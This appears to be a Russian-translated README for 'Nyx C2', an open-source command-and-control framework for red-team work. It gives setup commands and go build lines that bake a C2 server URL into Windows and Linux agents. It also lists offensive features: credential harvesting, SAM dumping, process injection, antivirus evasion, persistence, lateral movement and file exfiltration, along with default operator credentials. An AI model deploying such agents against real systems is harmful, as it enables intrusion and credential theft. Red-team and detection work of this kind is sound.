Nyx C2

Post-Exploitation активный

Модульный C2-фреймворк с кроссплатформенным агентом, сбором учётных данных и латеральным перемещением.


Установка
git clone https://github.com/omerbyrb/nyx
cd nyx
docker compose up -d
cd server
python3.11 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt
cd dashboard
npm install && npm run dev
cd agent
go build -o nyx-agent .
GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent.exe .
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent-linux .
показать оригинал переведено ИИ

Nyx C2

Nyx Logo

Фреймворк Command & Control с открытым исходным кодом для операций красной команды и симуляции действий противника

Только для авторизованного тестирования на проникновение, учений красной команды, соревнований CTF и обучения информационной безопасности.


Возможности

Функция Подробности
Кроссплатформенный агент Единый бинарный файл на Go — Linux, macOS, Windows (arm64 + amd64)
C2 в реальном времени Потоковая передача задач на основе WebSocket, без поллинга
Конструктор пейлоадов Компиляция кастомных агентов со встроенным URL C2 из панели управления
JWT-аутентификация Вход оператора, управление сессиями на основе токенов
Поддержка HTTPS TLS с флагом --tls на любом порту
Персистентность macOS LaunchAgent / Linux cron / реестр Windows
Передача файлов Скачивание файлов с агентов, загрузка файлов на агенты
Инъекция процессов Linux ptrace (удаленный mmap + запись шелл-кода), Windows CreateRemoteThread
Обход антивирусов XOR-обфускация строк URL C2 со случайным ключом для каждой сборки
Многопользовательский RBAC Роли admin / operator / readonly, интерфейс управления операторами
Латеральное перемещение Выполнение команд по SSH (пароль + ключ), сканер TCP-портов, обнаружение хостов в сети /24
Сбор учетных данных Ключи SSH, история командной оболочки, учетные данные AWS/GCP/Azure/K8s/Docker/git/npm
Перечисление для повышения привилегий sudo, SUID, cron, capabilities, группа docker, привилегии токенов Windows, UAC
Хранилище добычи Единое представление: скачанные файлы, скриншоты, учетные данные, результаты сканирования, результаты SSH
DoH-маяк Вторичный канал C2 через DNS-over-HTTPS (Cloudflare 1.1.1.1)
Шифрование AES-256-GCM Весь трафик агент↔сервер шифруется на прикладном уровне (опционально)
Загрузчик шелл-кода Выполнение шелл-кода внутри процесса через mmap (Linux/macOS) / VirtualAlloc (Windows)
SMB / WMI / PSExec Латеральное перемещение в Windows: net use + WMIC + PowerShell Remoting
Дамп SAM Дамп учетных данных Windows через reg save (требуются права SYSTEM)
Карта сети SVG-визуализация топологии просканированных хостов с легендой портов
Просмотр скриншотов Захват экрана агента — отображается встроенным изображением в Консоли
Экспорт IOC Полный отчет в JSON: IP-адреса, имена хостов, команды, эксфильтрация файлов, флаги персистентности
Правила YARA Автоматически сгенерированные правила обнаружения для бинарного файла агента + сетевого трафика + персистентности
MITRE ATT&CK TTP автоматически сопоставляются с выполненными командами
Заметки и теги агентов Аннотирование скомпрометированных хостов пользовательскими заметками и цветными тегами
Обнаружение Heartbeat Агенты автоматически помечаются как неактивные после 5 минут молчания
Панель оператора Интерфейс на React + Framer Motion с мониторингом агентов в реальном времени
Развертывание через Docker Развертывание одной командой docker compose up

Архитектура

┌─────────────────────────────────────────────────┐
│                  Operator                        │
│         React Dashboard (port 3000)              │
└─────────────┬───────────────────────────────────┘
              │ HTTPS / WebSocket
┌─────────────▼───────────────────────────────────┐
│              Nyx C2 Server                       │
│         FastAPI + SQLite (port 8000/8443)        │
└─────────────┬───────────────────────────────────┘
              │ HTTPS beacon
┌─────────────▼───────────────────────────────────┐
│              Nyx Agent                           │
│    Go binary — Linux / macOS / Windows           │
└─────────────────────────────────────────────────┘

Быстрый старт

Вариант 1 — Docker (Рекомендуется)

git clone https://github.com/omerbyrb/nyx
cd nyx
docker compose up -d
# Dashboard: http://localhost:3000
# API:       http://localhost:8000

Вариант 2 — Вручную

Сервер C2

cd server
python3.11 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt
python run.py                   # HTTP  :8000
python run.py --tls --port 8443 # HTTPS :8443

Панель управления

cd dashboard
npm install && npm run dev
# Open http://localhost:5173

Агент — локальная сборка

cd agent
go build -o nyx-agent .
./nyx-agent

Агент — кросс-компиляция

# Windows
GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent.exe .

# Linux
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent-linux .

Учетные данные по умолчанию: operator / nyx2024


Команды агента

Команда Описание
sysinfo Имя хоста, пользователь, ОС, архитектура, PID, IP
shell <cmd> Выполнить команду оболочки
whoami Текущий пользователь
ls [path] Список содержимого директории
cat <file> Чтение файла
ps Запущенные процессы
env Переменные окружения
netstat Активные сетевые соединения
ifconfig Сетевые интерфейсы
download <path> Эксфильтрация файла с агента
upload <path> <b64> Загрузка файла на агент
screenshot Захват экрана агента
persist Установка механизма персистентности
unpersist Удаление персистентности
sleep <sec> Установка интервала маяка
kill Завершение работы агента

Конструктор пейлоадов

Сгенерируйте скомпилированный бинарный файл агента прямо из панели управления:

  1. Перейдите на вкладку Builder
  2. Введите URL вашего сервера C2
  3. Выберите целевую платформу
  4. Настройте интервалы sleep/jitter
  5. Нажмите Build Agent — бинарный файл загрузится автоматически

Дорожная карта

  • [x] Кроссплатформенный агент на Go
  • [x] Сервер C2 на FastAPI с SQLite
  • [x] JWT-аутентификация оператора
  • [x] Потоковая передача в реальном времени через WebSocket
  • [x] Поддержка HTTPS/TLS
  • [x] Передача файлов (загрузка/скачивание)
  • [x] Захват скриншотов
  • [x] Персистентность (macOS/Linux/Windows)
  • [x] Интерфейс конструктора пейлоадов
  • [x] Развертывание через Docker
  • [x] Экспорт IOC (JSON) с сопоставлением TTP MITRE ATT&CK
  • [x] Генерация правил YARA (бинарный файл + сеть + персистентность)

  • [x] Встроенный просмотрщик скриншотов в консоли
  • [x] Заметки и теги агента
  • [x] Обнаружение неактивных агентов по heartbeat
  • [x] Инъекция в процесс — Linux (ptrace + remote mmap), Windows (VirtualAllocEx + CreateRemoteThread)
  • [x] Обфускация пейлоада — XOR-обфускация строки URL C2 со случайным ключом для каждой сборки
  • [x] RBAC для нескольких операторов (роли admin / operator / readonly)
  • [x] UI управления операторами (создание / редактирование роли / отключение / удаление)
  • [x] Латеральное перемещение — выполнение по SSH (аутентификация по паролю и ключу), сканер TCP-портов, обнаружение хостов
  • [x] Сбор учётных данных — SSH-ключи, история команд оболочки, облачные учётные данные, Docker, Kubernetes
  • [x] Перечисление векторов повышения привилегий (sudo, SUID, capabilities, токены Windows)
  • [x] UI хранилища добычи — файлы, скриншоты, учётные данные, сканы, результаты SSH
  • [x] Резервный маяк DNS-over-HTTPS (Cloudflare DoH, подключается через ldflags)
  • [x] Шифрование трафика на прикладном уровне AES-256-GCM (подключается через NYX_ENC_KEY)
  • [x] Внутрипроцессный загрузчик шелл-кода (mmap RWX на Linux/macOS, VirtualAlloc на Windows)
  • [x] Латеральное перемещение в Windows — выполнение через SMB (net use + копирование файла), выполнение через WMI, PSExec (WinRM)
  • [x] Дамп базы данных SAM Windows (reg save)
  • [x] Карта топологии сети (SVG, интерактивная, строится на основе результатов сканирования)

Юридическая информация

Этот инструмент предназначен для авторизованного пентестинга, учений red team, соревнований CTF и обучения информационной безопасности. Несанкционированное использование против систем, на тестирование которых у вас нет явного разрешения, является незаконным. Автор не несёт ответственности за неправомерное использование.


Названо в честь Никты — греческой богини ночи

Войдите, чтобы оставить комментарий